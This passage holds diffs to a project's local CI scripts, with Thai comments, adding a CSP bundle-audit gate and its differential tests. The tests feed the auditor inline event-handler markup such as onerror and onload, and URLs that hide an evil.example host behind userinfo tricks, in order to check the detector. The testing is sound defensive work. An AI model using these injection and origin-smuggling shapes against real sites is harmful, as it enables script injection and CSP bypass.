-# ที่สั่งข้าม build ทั้งที่ dist จากรอบก่อนยังอยู่และตรวจได้ = "ไม่รู้" กลายเป็น "สะอาด"
-# ซึ่งเป็น failure mode เดียวกับที่ gate นี้มีไว้กัน (Global Constraint ของแผน R2)
+# แยกสามสถานะ ไม่ใช่ผูกกับ **การมีอยู่ของ dist** อย่างเดียว (review รอบที่ 9 — M1):
+#   ขั้น frontend ล้ม     → fail · dist ที่เหลืออยู่เป็นของรอบก่อน ตรวจแทนกันไม่ได้ (vitest ตก
+#                          ก็นับด้วย ไม่ใช่เฉพาะ build — dist ที่ build จากโค้ดที่เทสไม่ผ่านก็เชื่อไม่ได้)
+#   ไม่ได้ build แต่มี dist → ตรวจ แต่เตือนว่าอาจเป็นของเก่า ("ไม่รู้" ต้องไม่กลายเป็น "สะอาด")
+#   ผ่านทั้งขั้น           → ตรวจตามปกติ
+# ของเดิมรัน audit กับ dist เก่าเมื่อ build ล้มแล้วขึ้น OK ซึ่งคือ failure mode ที่ gate นี้มีไว้กัน
 $distPath = Join-Path $Root 'frontend\dist'
-if (Test-Path -LiteralPath $distPath) {
+if ((-not $SkipFrontend) -and (-not $frontendBuilt)) {
+  Write-Fail 'csp bundle audit (ขั้น frontend ล้ม — dist ที่มีอยู่เป็นของรอบก่อน ตรวจแทนกันไม่ได้)'
+  $failed += 'csp-bundle-audit'
+} elseif (Test-Path -LiteralPath $distPath) {
   Write-Step 'CSP Bundle Audit'
+  if (-not $frontendBuilt) {
+    # ตรวจดีกว่าไม่ตรวจ แต่ต้องบอกว่าผลนี้อ้างถึง build ไหน ไม่งั้น OK จะถูกอ่านว่า
+    # "โค้ดปัจจุบันสะอาด" ทั้งที่ dist อาจเก่ากว่านั้นหลายคอมมิต
+    Write-Warn 'csp bundle audit: ตรวจ frontend/dist ที่มีอยู่เดิม (-SkipFrontend) — อาจไม่ตรงกับโค้ดปัจจุบัน'
+  }
   & node (Join-Path $Root 'scripts\audit-bundle-csp.mjs')
   if ($LASTEXITCODE -eq 0) {
     Write-Ok 'csp bundle audit'
@@ -176,7 +204,7 @@ if (Test-Path -LiteralPath $distPath) {
 } elseif ($SkipFrontend) {
   # ข้ามได้เฉพาะเมื่อผู้ใช้สั่งข้าม build เอง **และ** ไม่มี dist ให้ตรวจจริง ๆ
   # ข้อความต้องบอกทั้งสิ่งที่ขาดและวิธีแก้ ไม่ใช่ข้ามเงียบ
-  Write-Host 'skip CSP bundle audit: ไม่มี frontend/dist และสั่ง -SkipFrontend ไว้ — รัน npm run build ใน frontend/ ก่อน หรือเลิกใช้ -SkipFrontend'
+  Write-Skip 'csp bundle audit: ไม่มี frontend/dist และสั่ง -SkipFrontend ไว้ — รัน npm run build ใน frontend/ ก่อน หรือเลิกใช้ -SkipFrontend'
 } else {
   Write-Fail 'csp bundle audit (build เพิ่งรันแต่ไม่มี frontend/dist)'
   $failed += 'csp-bundle-audit'
@@ -222,7 +250,7 @@ if (-not $SkipE2E) {
     }
   }
 } else {
-  Write-Host 'skip E2E (-SkipE2E)'
+  Write-Skip 'E2E (-SkipE2E)'
 }
 
 # ---- 3) Backend PHPUnit ----------------------------------------------------
@@ -246,7 +274,7 @@ if (-not $SkipBackend) {
     }
   }
 } else {
-  Write-Host 'skip backend (-SkipBackend)'
+  Write-Skip 'backend (-SkipBackend)'
 }
 
 # ---- 4) Docker Build Check -------------------------------------------------
@@ -273,7 +301,7 @@ if (-not $SkipDocker) {
     }
   }
 } else {
-  Write-Host 'skip docker (-SkipDocker)'
+  Write-Skip 'docker (-SkipDocker)'
 }
 
 # ---- Summary ---------------------------------------------------------------

--- a/scripts/ci-local.ps1
+++ b/scripts/ci-local.ps1
@@ -7,6 +7,7 @@
   Local gates:
     0) Fast gates: schema parity + multiplier validator regression
     1) Frontend:  npm ci (optional) + npm audit (prod, high+) + npm test + npm run build
+    1.5) CSP audit: bundle ตรวจว่าไม่มีอะไรชน CSP หลัง enforce (อ่าน frontend/dist)
     2) E2E:       Playwright Chromium checks all sidebar menus (Docker db + backend)
     3) Backend:   bash backend/tests/run.sh  (Docker PHPUnit; needs Git Bash)
     4) Docker:    build frontend + backend images (no push)

--- a/scripts/ci-local.ps1
+++ b/scripts/ci-local.ps1
@@ -160,7 +160,11 @@ if (-not $SkipFrontend) {
 }
 
 # ---- 1.5) CSP bundle audit (ต้องรันหลัง build เพราะอ่าน frontend/dist) -------
-if (-not $SkipFrontend) {
+# เงื่อนไขผูกกับ **การมีอยู่ของ dist** ไม่ใช่ flag -SkipFrontend — ของเดิมข้าม audit ทุกครั้ง
+# ที่สั่งข้าม build ทั้งที่ dist จากรอบก่อนยังอยู่และตรวจได้ = "ไม่รู้" กลายเป็น "สะอาด"
+# ซึ่งเป็น failure mode เดียวกับที่ gate นี้มีไว้กัน (Global Constraint ของแผน R2)
+$distPath = Join-Path $Root 'frontend\dist'
+if (Test-Path -LiteralPath $distPath) {
   Write-Step 'CSP Bundle Audit'
   & node (Join-Path $Root 'scripts\audit-bundle-csp.mjs')
   if ($LASTEXITCODE -eq 0) {
@@ -169,8 +173,13 @@ if (-not $SkipFrontend) {
     Write-Fail 'csp bundle audit'
     $failed += 'csp-bundle-audit'
   }
+} elseif ($SkipFrontend) {
+  # ข้ามได้เฉพาะเมื่อผู้ใช้สั่งข้าม build เอง **และ** ไม่มี dist ให้ตรวจจริง ๆ
+  # ข้อความต้องบอกทั้งสิ่งที่ขาดและวิธีแก้ ไม่ใช่ข้ามเงียบ
+  Write-Host 'skip CSP bundle audit: ไม่มี frontend/dist และสั่ง -SkipFrontend ไว้ — รัน npm run build ใน frontend/ ก่อน หรือเลิกใช้ -SkipFrontend'
 } else {
-  Write-Host 'skip CSP bundle audit (ต้องมี frontend build ก่อน)'
+  Write-Fail 'csp bundle audit (build เพิ่งรันแต่ไม่มี frontend/dist)'
+  $failed += 'csp-bundle-audit'
 }
 
 # ---- 2) Playwright E2E: all sidebar menus ---------------------------------

--- a/scripts/ci-local.ps1
+++ b/scripts/ci-local.ps1
@@ -108,7 +108,9 @@ if ($LASTEXITCODE -eq 0) {
 
 # รันทั้งโฟลเดอร์ด้วย glob แบบเดียวกับ .githooks/pre-push, ci.yml และ ci-local.sh
 # PowerShell ไม่ขยาย glob ให้ native command แต่ node --test ขยายเองได้ (ยืนยันแล้ว)
-# ทุกไฟล์ในโฟลเดอร์นี้เป็น regression ที่ไม่ยิง production จริง (ใช้ mock origin)
+# ทุกไฟล์ในโฟลเดอร์นี้เป็น regression ที่ไม่ยิง production จริง (ใช้ mock origin) — รวมถึง
+# mock-server regression ของ CSP gate (issue #113 R1) ซึ่งเคยมีบล็อกของตัวเองต่อท้ายบล็อกนี้
+# แล้วถูกรันซ้ำสองรอบทุกครั้ง · glob ครอบอยู่แล้ว การไล่ชื่อซ้ำมีแต่ทำให้ CI ช้าลงเปล่า ๆ
 Write-Step 'Script Regressions'
 & node --test (Join-Path $Root 'scripts\tests\*.test.mjs')
 if ($LASTEXITCODE -eq 0) {
@@ -116,16 +118,6 @@ if ($LASTEXITCODE -eq 0) {
 } else {
   Write-Fail 'script regressions'
   $failed += 'script-regressions'
-}
-
-# mock-server regression ของ CSP gate — ไม่ยิง production จริง (issue #113 R1)
-Write-Step 'CSP Violation Gate Regression'
-& node --test (Join-Path $Root 'scripts\tests\check-csp-violations.test.mjs')
-if ($LASTEXITCODE -eq 0) {
-  Write-Ok 'csp violation gate regression'
-} else {
-  Write-Fail 'csp violation gate regression'
-  $failed += 'csp-violation-gate-regression'
 }
 
 # ---- 1) Frontend Build & Test ----------------------------------------------

--- a/scripts/ci-local.sh
+++ b/scripts/ci-local.sh
@@ -104,15 +104,22 @@ else
 fi
 
 # ---- 1.5) CSP bundle audit (ต้องรันหลัง build เพราะอ่าน frontend/dist) -------
-if [[ "${SKIP_FRONTEND}" -eq 0 ]]; then
+# เงื่อนไขผูกกับ **การมีอยู่ของ dist** ไม่ใช่ flag --skip-frontend — ของเดิมข้าม audit ทุกครั้ง
+# ที่สั่งข้าม build ทั้งที่ dist จากรอบก่อนยังอยู่และตรวจได้ = "ไม่รู้" กลายเป็น "สะอาด"
+# ซึ่งเป็น failure mode เดียวกับที่ gate นี้มีไว้กัน (Global Constraint ของแผน R2)
+if [[ -d "${ROOT}/frontend/dist" ]]; then
   step 'CSP Bundle Audit'
   if node "${ROOT}/scripts/audit-bundle-csp.mjs"; then
     ok 'csp bundle audit'
   else
     fail 'csp bundle audit'
   fi
+elif [[ "${SKIP_FRONTEND}" -eq 1 ]]; then
+  # ข้ามได้เฉพาะเมื่อผู้ใช้สั่งข้าม build เอง **และ** ไม่มี dist ให้ตรวจจริง ๆ
+  # ข้อความต้องบอกทั้งสิ่งที่ขาดและวิธีแก้ ไม่ใช่ข้ามเงียบ
+  echo 'skip CSP bundle audit: ไม่มี frontend/dist และสั่ง --skip-frontend ไว้ — รัน npm run build ใน frontend/ ก่อน หรือเลิกใช้ --skip-frontend'
 else
-  echo 'skip CSP bundle audit (ต้องมี frontend build ก่อน)'
+  fail 'csp bundle audit (build เพิ่งรันแต่ไม่มี frontend/dist)'
 fi
 
 # ---- 2) Playwright E2E: all sidebar menus ---------------------------------

--- a/scripts/ci-local.sh
+++ b/scripts/ci-local.sh
@@ -106,6 +106,18 @@ else
   echo 'skip frontend (--skip-frontend)'
 fi
 
+# ---- 1.5) CSP bundle audit (ต้องรันหลัง build เพราะอ่าน frontend/dist) -------
+if [[ "${SKIP_FRONTEND}" -eq 0 ]]; then
+  step 'CSP Bundle Audit'
+  if node "${ROOT}/scripts/audit-bundle-csp.mjs"; then
+    ok 'csp bundle audit'
+  else
+    fail 'csp bundle audit'
+  fi
+else
+  echo 'skip CSP bundle audit (ต้องมี frontend build ก่อน)'
+fi
+
 # ---- 2) Playwright E2E: all sidebar menus ---------------------------------
 if [[ "${SKIP_E2E}" -eq 0 ]]; then
   step 'E2E All Menus (Docker + Playwright Chromium)'

--- a/scripts/ci-local.sh
+++ b/scripts/ci-local.sh
@@ -5,6 +5,7 @@
 # Local gates:
 #   0) Fast gates: schema parity + multiplier validator regression
 #   1) Frontend:  npm ci (optional) + vitest + build
+#   1.5) CSP audit: bundle ตรวจว่าไม่มีอะไรชน CSP หลัง enforce (อ่าน frontend/dist)
 #   2) E2E:       Playwright Chromium checks all sidebar menus (Docker db + backend)
 #   3) Backend:   bash backend/tests/run.sh
 #   4) Docker:    build frontend + backend images (no push)
@@ -32,7 +33,9 @@ FAILED=()
 STARTED=$(date +%s)
 
 usage() {
-  sed -n '2,18p' "$0" | sed 's/^# \?//'
+  # อ่านบล็อกคอมเมนต์หัวไฟล์ทั้งก้อนจนถึงบรรทัดแรกที่ไม่ใช่คอมเมนต์ — ไม่ผูกกับเลขบรรทัด
+  # ตายตัว เพราะช่วง '2,18p' เดิมตัดบรรทัด --help หายทันทีที่มีคนเพิ่ม gate ในหัวไฟล์
+  awk 'NR>1 { if (!/^#/) exit; sub(/^# ?/, ""); print }' "$0"
   exit 0
 }
 

--- a/scripts/ci-local.sh
+++ b/scripts/ci-local.sh
@@ -55,6 +55,11 @@ done
 step() { printf '\n=== %s ===\n' "$1"; }
 ok()   { printf 'OK  %s\n' "$1"; }
 fail() { printf 'FAIL  %s\n' "$1"; FAILED+=("$1"); }
+# สองตัวนี้ไม่แตะ FAILED — บอกว่า "ตรวจแล้วแต่เชื่อได้ไม่เต็มร้อย" กับ "ไม่ได้ตรวจ" ซึ่งไม่ใช่
+# ความล้มเหลว แต่ก็ไม่ใช่ผ่าน · รูปแบบ prefix อยู่ที่เดียวกับ ok/fail เพื่อให้เทสที่จับ marker
+# เหล่านี้ (scripts/tests/ci-local-csp-gate.test.mjs) ไม่ผูกกับสตริงที่กระจายอยู่หลายที่
+warn() { printf 'WARN  %s\n' "$1"; }
+skip() { printf 'SKIP  %s\n' "$1"; }
 
 echo "smart-port local CI  (root: ${ROOT})"
 echo "flags: skip-install=${SKIP_INSTALL} skip-frontend=${SKIP_FRONTEND} skip-e2e=${SKIP_E2E} skip-backend=${SKIP_BACKEND} skip-docker=${SKIP_DOCKER}"
@@ -80,35 +85,63 @@ else
 fi
 
 # ---- 1) Frontend -----------------------------------------------------------
+# เช็กสถานะทีละคำสั่งเอง **ไม่พึ่ง `set -e`** — bash ปิด errexit ให้ทุกคำสั่งที่เป็นเงื่อนไขของ
+# `if` / `&&` / `||` และการปิดนั้นทะลุเข้าไปใน subshell ด้วย แม้จะสั่ง `set -e` ซ้ำข้างในก็ตาม
+# วัดแล้ว: vitest ตกกลางทางแต่ยังได้ `OK  frontend test + build` เพราะสถานะที่ได้คือของคำสั่ง
+# สุดท้าย (`npm run build`) เท่านั้น · ทั้งรูป `( … ) && ok || fail` เดิมและรูป `if ( … )` มีปัญหา
+# เดียวกัน ต่างกันแค่ตอนนี้ flag ตัวนี้ไปตัดสิน CSP gate ต่อ ผลจึงกลายเป็น "เทสตก แต่ gate เขียว"
+# ฝั่ง ci-local.ps1 เช็ก $LASTEXITCODE ทีละคำสั่งอยู่แล้ว จึงไม่เคยมีอาการนี้
+frontend_gate() {
+  cd "${ROOT}/frontend" || return 1
+  if [[ "${SKIP_INSTALL}" -eq 0 ]]; then
+    echo 'npm ci ...'
+    npm ci || return 1
+  else
+    # ตัวพิมพ์เล็กโดยตั้งใจ — บรรทัดนี้อยู่ระดับเดียวกับ `npm ci ...` / `npm test (vitest) ...`
+    # คือรายงานความคืบหน้า *ภายใน* gate ไม่ใช่การตัดสินระดับ gate ที่ summary สนใจ จึงไม่ใช้ skip()
+    echo 'skip npm ci (--skip-install)'
+  fi
+
+  # pool/maxWorkers come from frontend/vitest.config.js (forks + 2 workers)
+  echo 'npm test (vitest) ...'
+  npx vitest run --reporter=dot || return 1
+
+  echo 'npm run build ...'
+  npm run build || return 1
+}
+
+# FRONTEND_BUILT บันทึกว่า dist ที่จะตรวจในบล็อกถัดไปมาจาก build ของ **โค้ดรอบนี้** หรือไม่
+# — "มี dist" กับ "dist ตรงกับโค้ดปัจจุบัน" เป็นคนละเรื่อง และ gate นี้สนใจอย่างหลัง
+FRONTEND_BUILT=0
 if [[ "${SKIP_FRONTEND}" -eq 0 ]]; then
   step 'Frontend Build & Test'
-  (
-    set -e
-    cd "${ROOT}/frontend"
-    if [[ "${SKIP_INSTALL}" -eq 0 ]]; then
-      echo 'npm ci ...'
-      npm ci
-    else
-      echo 'skip npm ci (--skip-install)'
-    fi
-
-    # pool/maxWorkers come from frontend/vitest.config.js (forks + 2 workers)
-    echo 'npm test (vitest) ...'
-    npx vitest run --reporter=dot
-
-    echo 'npm run build ...'
-    npm run build
-  ) && ok 'frontend test + build' || fail 'frontend'
+  # ห่อด้วย subshell เพื่อไม่ให้ `cd` ข้างในรั่วไปถึง gate ถัดไป
+  if ( frontend_gate ); then
+    ok 'frontend test + build'
+    FRONTEND_BUILT=1
+  else
+    fail 'frontend'
+  fi
 else
-  echo 'skip frontend (--skip-frontend)'
+  skip 'frontend (--skip-frontend)'
 fi
 
 # ---- 1.5) CSP bundle audit (ต้องรันหลัง build เพราะอ่าน frontend/dist) -------
-# เงื่อนไขผูกกับ **การมีอยู่ของ dist** ไม่ใช่ flag --skip-frontend — ของเดิมข้าม audit ทุกครั้ง
-# ที่สั่งข้าม build ทั้งที่ dist จากรอบก่อนยังอยู่และตรวจได้ = "ไม่รู้" กลายเป็น "สะอาด"
-# ซึ่งเป็น failure mode เดียวกับที่ gate นี้มีไว้กัน (Global Constraint ของแผน R2)
-if [[ -d "${ROOT}/frontend/dist" ]]; then
+# แยกสามสถานะ ไม่ใช่ผูกกับ **การมีอยู่ของ dist** อย่างเดียว (review รอบที่ 9 — M1):
+#   ขั้น frontend ล้ม     → fail · dist ที่เหลืออยู่เป็นของรอบก่อน ตรวจแทนกันไม่ได้ (vitest ตก
+#                          ก็นับด้วย ไม่ใช่เฉพาะ build — dist ที่ build จากโค้ดที่เทสไม่ผ่านก็เชื่อไม่ได้)
+#   ไม่ได้ build แต่มี dist → ตรวจ แต่เตือนว่าอาจเป็นของเก่า ("ไม่รู้" ต้องไม่กลายเป็น "สะอาด")
+#   ผ่านทั้งขั้น           → ตรวจตามปกติ
+# ของเดิมรัน audit กับ dist เก่าเมื่อ build ล้มแล้วขึ้น OK ซึ่งคือ failure mode ที่ gate นี้มีไว้กัน
+if [[ "${SKIP_FRONTEND}" -eq 0 && "${FRONTEND_BUILT}" -eq 0 ]]; then
+  fail 'csp bundle audit (ขั้น frontend ล้ม — dist ที่มีอยู่เป็นของรอบก่อน ตรวจแทนกันไม่ได้)'
+elif [[ -d "${ROOT}/frontend/dist" ]]; then
   step 'CSP Bundle Audit'
+  if [[ "${FRONTEND_BUILT}" -eq 0 ]]; then
+    # ตรวจดีกว่าไม่ตรวจ แต่ต้องบอกว่าผลนี้อ้างถึง build ไหน ไม่งั้น OK จะถูกอ่านว่า
+    # "โค้ดปัจจุบันสะอาด" ทั้งที่ dist อาจเก่ากว่านั้นหลายคอมมิต
+    warn 'csp bundle audit: ตรวจ frontend/dist ที่มีอยู่เดิม (--skip-frontend) — อาจไม่ตรงกับโค้ดปัจจุบัน'
+  fi
   if node "${ROOT}/scripts/audit-bundle-csp.mjs"; then
     ok 'csp bundle audit'
   else
@@ -117,7 +150,7 @@ if [[ -d "${ROOT}/frontend/dist" ]]; then
 elif [[ "${SKIP_FRONTEND}" -eq 1 ]]; then
   # ข้ามได้เฉพาะเมื่อผู้ใช้สั่งข้าม build เอง **และ** ไม่มี dist ให้ตรวจจริง ๆ
   # ข้อความต้องบอกทั้งสิ่งที่ขาดและวิธีแก้ ไม่ใช่ข้ามเงียบ
-  echo 'skip CSP bundle audit: ไม่มี frontend/dist และสั่ง --skip-frontend ไว้ — รัน npm run build ใน frontend/ ก่อน หรือเลิกใช้ --skip-frontend'
+  skip 'csp bundle audit: ไม่มี frontend/dist และสั่ง --skip-frontend ไว้ — รัน npm run build ใน frontend/ ก่อน หรือเลิกใช้ --skip-frontend'
 else
   fail 'csp bundle audit (build เพิ่งรันแต่ไม่มี frontend/dist)'
 fi
@@ -155,7 +188,7 @@ if [[ "${SKIP_E2E}" -eq 0 ]]; then
     fail 'e2e'
   fi
 else
-  echo 'skip E2E (--skip-e2e)'
+  skip 'E2E (--skip-e2e)'
 fi
 
 # ---- 3) Backend ------------------------------------------------------------
@@ -167,7 +200,7 @@ if [[ "${SKIP_BACKEND}" -eq 0 ]]; then
     fail 'backend'
   fi
 else
-  echo 'skip backend (--skip-backend)'
+  skip 'backend (--skip-backend)'
 fi
 
 # ---- 4) Docker -------------------------------------------------------------
@@ -185,7 +218,7 @@ if [[ "${SKIP_DOCKER}" -eq 0 ]]; then
     ) && ok 'docker images built' || fail 'docker'
   fi
 else
-  echo 'skip docker (--skip-docker)'
+  skip 'docker (--skip-docker)'
 fi
 
 # ---- Summary ---------------------------------------------------------------

--- a/scripts/ci-local.sh
+++ b/scripts/ci-local.sh
@@ -69,20 +69,14 @@ fi
 
 # รันทั้งโฟลเดอร์ด้วย glob แบบเดียวกับ .githooks/pre-push และ ci.yml — ไล่ชื่อทีละไฟล์
 # เคยทำให้เทสที่เพิ่มใหม่หลุดจากทางเข้านี้เงียบ ๆ (ไม่มีใครเห็นว่ามันไม่ถูกรัน)
-# ทุกไฟล์ในโฟลเดอร์นี้เป็น regression ที่ไม่ยิง production จริง (ใช้ mock origin)
+# ทุกไฟล์ในโฟลเดอร์นี้เป็น regression ที่ไม่ยิง production จริง (ใช้ mock origin) — รวมถึง
+# mock-server regression ของ CSP gate (issue #113 R1) ซึ่งเคยมีบล็อกของตัวเองต่อท้ายบล็อกนี้
+# แล้วถูกรันซ้ำสองรอบทุกครั้ง · glob ครอบอยู่แล้ว การไล่ชื่อซ้ำมีแต่ทำให้ CI ช้าลงเปล่า ๆ
 step 'Script Regressions'
 if node --test "${ROOT}"/scripts/tests/*.test.mjs; then
   ok 'script regressions'
 else
   fail 'script regressions'
-fi
-
-# mock-server regression ของ CSP gate — ไม่ยิง production จริง (issue #113 R1)
-step 'CSP Violation Gate Regression'
-if node --test "${ROOT}/scripts/tests/check-csp-violations.test.mjs"; then
-  ok 'csp violation gate regression'
-else
-  fail 'csp violation gate regression'
 fi
 
 # ---- 1) Frontend -----------------------------------------------------------

--- a/scripts/tests/audit-bundle-csp.differential.test.mjs
+++ b/scripts/tests/audit-bundle-csp.differential.test.mjs
@@ -1,0 +1,200 @@
+import assert from 'node:assert/strict';
+import { existsSync, mkdirSync, mkdtempSync, rmSync, writeFileSync } from 'node:fs';
+import { tmpdir } from 'node:os';
+import { dirname, join, resolve } from 'node:path';
+import test from 'node:test';
+import { fileURLToPath, pathToFileURL } from 'node:url';
+import { auditBundle, EVENT_HANDLER_ATTRIBUTES } from '../audit-bundle-csp.mjs';
+
+// Issue #113 (R2) — differential test: ให้ **ตัว parse จริง** เป็นกรรมการ แทนการไล่นึกรูปที่ยังไม่ได้ปิด
+//
+// ทำไมต้องมีไฟล์นี้แยก: gate ตัวนี้ถูกรีวิว 6 รอบ ทุกรอบเจอ false clean ของ **คลาสเดียวกัน** คือ
+// กฎเดาโครงสร้างเอาเองด้วย regex แล้วพลาดรูปที่คนเขียนกฎนึกไม่ถึง · การไล่ปิดทีละรูปแพ้มาหกรอบแล้ว
+// เพราะมันแข่งกับจินตนาการของคนเขียน ไม่ใช่กับมาตรฐานจริง
+//
+// เทสในไฟล์นี้จึงไม่ได้ระบุ "คำตอบที่ถูก" เอง แต่ถาม **แหล่งความจริงเดียวกับที่ browser ใช้**:
+//   – `parse5` (HTML tokenizer อ้างอิงตาม spec เดียวกับที่ browser ใช้) ตอบว่า markup นี้มี
+//     attribute อะไรบ้างจริง ๆ
+//   – `new URL()` (WHATWG URL parser) ตอบว่า URL นี้ browser จะไปที่ origin ไหนจริง ๆ
+// แล้ว assert ว่า gate เห็นตรงกัน · รูปแบบใหม่ที่ยังไม่มีใครนึกถึงจึงถูกครอบไปด้วยโดยอัตโนมัติ
+//
+// **การพึ่ง dependency**: `scripts/` ตั้งใจให้รันด้วย `node --test` เปล่า ๆ ไม่ต้องติดตั้งอะไร
+// ไฟล์นี้จึงยืม parse5 จาก `frontend/node_modules` (มาจาก jsdom ที่ vitest ใช้อยู่แล้ว) และ
+// **ข้ามตัวเองพร้อมเหตุผลที่อ่านออก** เมื่อยังไม่ได้ `npm install` ฝั่ง frontend — ไม่ใช่ fail
+// เพราะการบังคับให้ทุกคนติดตั้ง frontend ก่อนรัน script test จะทำให้ gate อื่น ๆ พังไปด้วย
+// ในทางปฏิบัติเทสนี้ได้รันจริงเสมอบนเส้นทางที่สำคัญ: `.githooks/pre-push` รัน vitest อยู่แล้ว
+// จึงต้องมี node_modules ครบ · CI ก็ `npm ci` ฝั่ง frontend ก่อน
+
+const ROOT = resolve(dirname(fileURLToPath(import.meta.url)), '..', '..');
+const PARSE5_ENTRY = resolve(ROOT, 'frontend', 'node_modules', 'parse5', 'dist', 'index.js');
+
+/** policy ที่สะท้อน production — เทสใน audit-bundle-csp.test.mjs ยืนยันว่าตรงกับ render.yaml จริง */
+const POLICY =
+  "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com; " +
+  "font-src https://fonts.gstatic.com; img-src 'self' data:; connect-src 'self'; object-src 'none'; " +
+  "frame-ancestors 'none'; base-uri 'self'; form-action 'self'; report-uri /api/csp-report";
+
+const parse5 = existsSync(PARSE5_ENTRY) ? await import(pathToFileURL(PARSE5_ENTRY).href) : null;
+const skip = parse5
+  ? false
+  : `ไม่พบ parse5 ที่ ${PARSE5_ENTRY} — รัน \`npm ci\` ใน frontend/ ก่อน (เทส differential ต้องใช้ตัว parse จริงเป็นกรรมการ)`;
+
+function makeDist(files) {
+  const dir = mkdtempSync(join(tmpdir(), 'csp-diff-'));
+  for (const [rel, content] of Object.entries(files)) {
+    const full = join(dir, rel);
+    mkdirSync(dirname(full), { recursive: true });
+    writeFileSync(full, content);
+  }
+  return { dir, cleanup: () => rmSync(dir, { recursive: true, force: true }) };
+}
+
+/** ชื่อ attribute ทั้งหมดที่ parse5 มองเห็นในเอกสาร — เดินทั้งต้นไม้ ไม่ใช่แค่ระดับบนสุด */
+function attributeNamesFrom(html) {
+  const names = new Set();
+  const walk = (node) => {
+    for (const attr of node.attrs ?? []) names.add(attr.name.toLowerCase());
+    for (const child of node.childNodes ?? []) walk(child);
+    if (node.content) walk(node.content); // <template>
+  };
+  walk(parse5.parse(html));
+  return names;
+}
+
+/**
+ * รูปแบบ markup ที่ต้องให้ผลตรงกับ parse5
+ *
+ * ตั้งใจใส่รูปที่ **เคยหลุดจริง** ปนกับรูปที่ยังไม่มีใครรายงาน — ค่าของเทสนี้อยู่ที่กลุ่มหลัง
+ *
+ * **แท็กต้องอยู่ในบริบทที่ HTML ยอมรับ** — `parse5` ทำตาม tree-construction rules ของ spec
+ * เต็มรูป จึง**ทิ้ง** `<td>` ที่อยู่นอก `<table>` ไปทั้งแท็ก ขณะที่ gate สแกนแบบไม่สนบริบท
+ * (ซึ่งถูกต้องตามหน้าที่: HTML fragment ใน chunk JS ไม่มี wrapper แต่ handler จะทำงานจริง
+ * เมื่อ fragment ถูก inject เข้าที่) · fixture ที่วางผิดบริบทจึงเทียบกันไม่ได้ ไม่ใช่บั๊กของ gate
+ */
+const MARKUP_SHAPES = [
+  '<img onerror="x()">',
+  '<img/onerror="x()">',                       // review ฌ — ไม่มีช่องว่างนำหน้า
+  '<img src=y /onerror="x()">',                // review ฌ — หลัง self-closing slash
+  '<a href="y"onclick="x()">t</a>',            // review ฌ — ติดกับ quote ปิด
+  '<img alt="a>b" onclick="x()">',             // review จ — `>` ในค่า attribute
+  "<img alt='a>b' onmouseover=\"x()\">",       // เหมือนบน แต่ single quote
+  '<img ONCLICK="x()">',                       // ตัวพิมพ์ใหญ่
+  '<img onclick=x()>',                         // ค่าไม่มี quote
+  '<img\nonclick="x()">',                      // ขึ้นบรรทัดใหม่แทนช่องว่าง
+  '<img\tonclick="x()">',                      // tab
+  '<img onclick = "x()">',                     // เว้นวรรครอบ =
+  '<body onload="x()"></body>',
+  '<svg onload="x()"></svg>',
+  '<div data-onclick="x" onclick="y()"></div>', // data-onclick ต้องไม่นับ แต่ onclick ต้องนับ
+  '<input onfocus="x()" autofocus>',
+  '<button onpointerdown="x()">t</button>',
+  '<table><tr><td onbeforetoggle="x()"></td></tr></table>', // ต้องมี wrapper ไม่งั้น parse5 ทิ้งแท็ก
+  '<img data-src="a" onerror="x()">',
+  '<form action="/x" onsubmit="y()"></form>',
+];
+
+test('ทุก event handler ที่ parse5 มองเห็น gate ต้องเห็นด้วย (differential)', { skip }, () => {
+  for (const shape of MARKUP_SHAPES) {
+    const html = `<!doctype html><html><body>${shape}</body></html>`;
+    // แหล่งความจริง: parse5 บอกว่า browser เห็น attribute อะไร · กรองด้วยชุดเดียวกับที่กฎใช้
+    // เพราะ attribute ชื่อ `onfoo` ที่ไม่ใช่ event จริง browser ไม่ compile เป็นโค้ดตั้งแต่แรก
+    const expected = [...attributeNamesFrom(html)].filter((n) => EVENT_HANDLER_ATTRIBUTES.has(n)).sort();
+
+    const { dir, cleanup } = makeDist({ 'index.html': html });
+    try {
+      const { findings } = auditBundle(dir, POLICY);
+      const actual = findings
+        .filter((f) => f.rule === 'inline-event-handler')
+        .map((f) => f.detail.match(/handler: (on[a-z]+)=/)?.[1])
+        .filter(Boolean)
+        .sort();
+      assert.deepEqual(
+        actual,
+        expected,
+        `${shape}\n  parse5 เห็น: ${JSON.stringify(expected)}\n  gate เห็น: ${JSON.stringify(actual)}`
+      );
+    } finally {
+      cleanup();
+    }
+  }
+});
+
+/**
+ * รูปแบบ URL ที่ต้องให้ผลตรงกับ `new URL()`
+ *
+ * กลุ่ม userinfo คือคลาสที่ปิดไม่หมดมาสองรอบ (review ฉ ปิด `@` ติดกัน · review ซ พบว่า
+ * ตัวคั่นที่เพิ่มเข้ามาเพื่อแยก `url(a),url(b)` เปิดช่องเดิมกลับมา) — ที่นี่ไม่ไล่ทีละตัวคั่นแล้ว
+ * แต่ให้ URL parser ตอบเองว่า host คืออะไร
+ */
+const URL_SHAPES = [
+  'https://evil.example/x',
+  'https://EVIL.example/x',
+  'https://evil.example:8443/x',
+  'https://evil.example./x',
+  'https://fonts.gstatic.com@evil.example/x',
+  'https://fonts.gstatic.com,x@evil.example/x',
+  'https://fonts.gstatic.com;x@evil.example/x',
+  'https://fonts.gstatic.com(x@evil.example/x',
+  'https://fonts.googleapis.com{x@evil.example/x',
+  'https://user:pass@evil.example/x',
+  'https://fonts.googleapis.com_evil.example/x',
+  'http://[2001:db8::1]/x',
+  'http://[::1]:9000/x',
+  'https://sub.evil.example/a/b?c=d',
+];
+
+test('ทุก origin ที่ new URL() ตัดสิน gate ต้องเห็นตรงกัน (differential)', { skip }, () => {
+  for (const raw of URL_SHAPES) {
+    const expected = new URL(raw).origin.toLowerCase(); // แหล่งความจริงเดียวกับที่ browser ใช้
+    const { dir, cleanup } = makeDist({
+      'index.html': '<!doctype html><html><body>x</body></html>',
+      'assets/probe.js': `const u = "${raw}";`,
+    });
+    try {
+      const { findings } = auditBundle(dir, POLICY);
+      const reported = findings.map((f) => f.detail);
+      assert.ok(
+        reported.some((d) => d.includes(expected)),
+        `${raw}\n  new URL() บอก origin: ${expected}\n  gate รายงาน: ${JSON.stringify(reported)}`
+      );
+    } finally {
+      cleanup();
+    }
+  }
+});
+
+test('URL ที่ policy อนุญาตจริงต้องไม่ถูกฟ้อง (differential — ฝั่งกันแก้เกิน)', { skip }, () => {
+  // คู่ตรงข้ามของเทสบน: ถ้า `new URL()` บอกว่า origin คือตัวที่ policy อนุญาต gate ต้องเงียบ
